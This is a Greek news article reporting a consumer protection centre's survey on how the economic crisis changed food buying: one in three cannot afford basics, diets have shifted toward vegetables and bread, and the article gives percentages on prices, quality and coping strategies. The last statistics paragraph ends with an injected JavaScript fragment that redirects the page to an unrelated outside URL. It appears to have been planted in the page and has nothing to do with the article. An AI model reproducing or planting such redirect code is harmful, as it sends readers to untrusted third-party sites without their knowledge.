ΚΕΠΚΑ: 1 στους 3 δεν μπορεί να αγοράσει τα βασικά είδη διατροφής

0
4

 

Αποκαλυπτικά είναι τα στοιχεία που αποκαλύπτει η έρευνα την οποία διηνήρηγησε το Κέντρο Προστασίας Καταναλωτών, σύμφωνα με την οποία οι Έλληνες αναγκάζονται να αλλάξουν τις διατροφικές τους συνήθειες, καθώς ένας στους τρεις δηλώνει πλέον δεν μπορεί να αγοράσει ούτε τα βασικά είδη διατροφής λόγω της δεινής οικονομικής του κατάστασης.

Οι Έλληνες καταναλωτές πλέον έρχονται πιο κοντά στη μεσογειακή διατροφή μειώνοντας παράλληλα την κατανάλωση γευμάτων εκτός σπιτιού ή σε καταστήματα fast food, σε σχέση με το 2011.

Όπως ανέφεραν σε συνέντευξη Τύπου, ο πρόεδρος του Κέντρου Προστασίας Καταναλωτών (ΚΕΠΚΑ), Νίκος Τσεμπερλίδης και η γενική γραμματέας του Κέντρου, Ευαγγελία Κεκελέκη, η οικονομική κρίση οδήγησε τους καταναλωτές σε καλύτερες επιλογές σε σχέση με τη μεσογειακή διατροφή.

Είναι χαρακτηριστικό, ότι όπως προκύπτει από την έρευνα που έγινε μέσω ερωτηματολογίου που αναρτήθηκε στην ιστοσελίδα του ΚΕΠΚΑ και πραγματοποιήθηκε από τις 8 Ιουλίου έως τις 28 Σεπτεμβρίου, το ψωμί, τα λαχανικά και τα φρούτα έχουν μπει σχεδόν καθημερινά στο τραπέζι των καταναλωτών. Από την άλλη πλευρά, τα κόκκινα κρέατα, τα ψάρια, οι τηγανητές πατάτες και τα αναψυκτικά έχουν περιοριστεί σε μία φορά την εβδομάδα. Τα γλυκά, τα όσπρια, τα ζυμαρικά, το κοτόπουλο, τα αυγά και το γάλα καταναλώνονται ελάχιστες φορές την εβδομάδα, ενώ η κατανάλωση αρνιού και κατσικιού περιορίζεται σε μια φορά το μήνα.

Σε σχέση με αντίστοιχη έρευνα του 2011, η διατροφή των Ελλήνων φαίνεται να βελτιώνεται, καθώς οι καταναλωτές επιλέγουν λιγότερο το χοιρινό, τα αναψυκτικά και τις τηγανητές πατάτες και περισσότερο τα φρούτα και τα λαχανικά.

Τα παραπάνω συμπεράσματα προκύπτουν από έρευνα που διενήργησε το περασμένο χρονικό διάστημα, το Κέντρο Προστασίας Καταναλωτών (ΚΕΠΚΑ), σε δείγμα 1.059 καταναλωτών από όλη την Ελλάδα.

Συγκεκριμένα, στο ερώτημα ποια προβλήματα αντιμετωπίζουν οι καταναλωτές με τα τρόφιμα, το 26,20% απάντησε ότι το μεγαλύτερο πρόβλημα είναι η ακρίβεια, ενώ το 20,9% η κακή ποιότητα και το 18,07% η ασφάλεια και η υγιεινή. Εντύπωση, κατά το ΚΕΠΚΑ προκαλεί το γεγονός, ότι το 34,83% των ερωτηθέντων απάντησε ότι δεν αντιμετωπίζει κανένα πρόβλημα.

Όσον αφορά στην αιτία που προκάλεσε τις αλλαγές στις διατροφικές συνήθειες, οι ερωτηθέντες απάντησαν ότι η αιτία αυτή είναι η υγεία, σε ποσοστό 48,45%, η οικονομική κατάσταση σε ποσοστό 27,49%, άλλο, σε ποσοστό 9,28%, η οικογενειακή κατάσταση σε ποσοστό 5,84%, η εργασία κατά 4,82% και ο τόπος κατοικίας κατά 4,12%.

Ειδικότερα, το 63,06% των καταναλωτών δηλώνουν ότι επηρεάστηκαν οι αγοραστικές του συνήθειες απέναντι στα προϊόντα διατροφής λόγω οικονομικής κρίσης.

Στην ερώτηση πώς έγινε αυτό, ποσοστό 49,52% των ερωτηθέντων απάντησαν ότι ψάχνουν τα ίδια προϊόντα με χαμηλότερη τιμή σε άλλα καταστήματα, 46,62% αγοράζουν με την ίδια συχνότητα μόνο τα απαραίτητα, 37,94% στράφηκαν σε προϊόντα ιδιωτικής ετικέτας των σουπερμάρκετ, 33,12% αγοράζουν στην ίδια συχνότητα μικρότερες, όμως, ποσότητες, ενώ 10,93% αγοράζουν συχνότερα μικρότερες ποσότητες και 6,43% πιο σπάνια ίδιες ποσότητες. setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here